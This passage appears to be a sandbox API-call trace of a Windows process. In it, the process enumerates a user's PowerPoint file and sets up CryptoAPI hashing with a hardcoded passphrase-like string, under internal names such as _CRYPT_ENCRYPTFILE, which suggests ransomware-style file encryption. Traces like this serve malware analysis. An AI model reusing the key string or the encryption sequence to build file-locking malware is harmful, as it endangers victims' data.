hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.946] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.947] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.948] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ba22bc0, ftCreationTime.dwHighDateTime=0x1d5bbe6, ftLastAccessTime.dwLowDateTime=0xcebf87c0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xcebf87c0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x6f55, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="LI-IwwMLWnmp-I.pptx", cAlternateFileName="LI-IWW~1.PPT")) returned 0x41ac600 [0076.948] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.948] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.951] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0076.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0076.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0076.951] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0076.952] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.952] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.952] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.953] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.953] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.953] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.953] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca658, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0076.953] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0076.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.953] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0076.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca898, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0076.954] CryptHashData (hHash=0x41ac180, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0076.955] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0076.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0076.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0076.955] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0076.956] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0076.956] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.958] 